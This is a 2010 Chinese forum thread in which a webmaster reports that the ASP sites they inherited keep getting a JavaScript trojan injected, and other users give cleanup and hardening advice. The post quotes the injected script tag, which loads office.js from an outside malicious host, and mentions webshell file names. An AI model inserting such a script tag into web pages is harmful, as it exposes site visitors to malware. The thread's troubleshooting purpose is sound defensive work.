asp网站被挂js木马怎么办

a19895161989516 2010-06-12 04:19:02
查了一下源文件 都加了一句这样的代码
<script language="javascript" src="http://26k.officea.ze.tc/office.js?google_ad_format=728x90_as"></script>

大家可以打开这个网址看一下看你的杀毒软件怎么提示http://26k.officea.ze.tc/office.js?google_ad_format=728x90_as
...全文
87 12 打赏 收藏 转发到动态 举报
写回复
用AI写文章
12 条回复
切换为时间正序
请发表友善的回复…
发表回复
a19895161989516 2010-06-12
  • 打赏
  • 举报
回复
一共4个站点 我看到 好多 页面都有 木马代码 ,有没有快点的方法
peedu888 2010-06-12
  • 打赏
  • 举报
回复
首先找到木马代码清除,然后检查程序漏洞!
yj05328 2010-06-12
  • 打赏
  • 举报
回复
查找一下源文件,里面可能有一些非法文件
a19895161989516 2010-06-12
  • 打赏
  • 举报
回复
哦 把程序重新上传,然后找空间服务提供商 修改一下文件的读取权限,权限除了数据库其他都改成不可写,是这样吧。
谢谢你了,你这人实在是太热情了!



chen_bruce 2010-06-12
  • 打赏
  • 举报
回复
看看有没有可疑文件(dama.asp、xiaoma.asp等等),并可借助软件(冰舞、明小子)查查是不是有漏洞。
gingerkang 2010-06-12
  • 打赏
  • 举报
回复
这样呀,不一定是程序本身的问题,可能是服务器安全有问题,你把没有问题的代码上传,再要求空间服务商把文件权限除了数据库其他都改成不可写.
a19895161989516 2010-06-12
  • 打赏
  • 举报
回复
[Quote=引用 5 楼 gingerkang 的回复:]
你不能管理你网站的文件吗?空间商没有提供iis访问日志?
[/Quote]网站提供了一个留言板向数据库写数据 ,没有提供文件上传等功能
网站现在还可以打开 ,但打开会提示有威胁,程序不是我写的 是以前的 程序员写的 ,他走了,经理让我改改。估计应该是没有过滤向数据库里面写数据,数据库也打不开了 网址是:http://www.acqcfw.com/
gingerkang 2010-06-12
  • 打赏
  • 举报
回复
你不能管理你网站的文件吗?空间商没有提供iis访问日志?
a19895161989516 2010-06-12
  • 打赏
  • 举报
回复
[Quote=引用 3 楼 gingerkang 的回复:]
根据被更改的时间,查询iis日志
[/Quote]

这个怎么查呀?空间是人家提供的,看文件修改时间?
gingerkang 2010-06-12
  • 打赏
  • 举报
回复
根据被更改的时间,查询iis日志
a19895161989516 2010-06-12
  • 打赏
  • 举报
回复
不知道从何下手 呀 站点下有好几个网站 都挂了 马了 ,除掉了 发现过一段时间又加上了,找不出根源所在
gingerkang 2010-06-12
  • 打赏
  • 举报
回复
能怎么办?找出问题,解决问题。再不就关站大吉。
这类帖子很多了,自己搜下

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧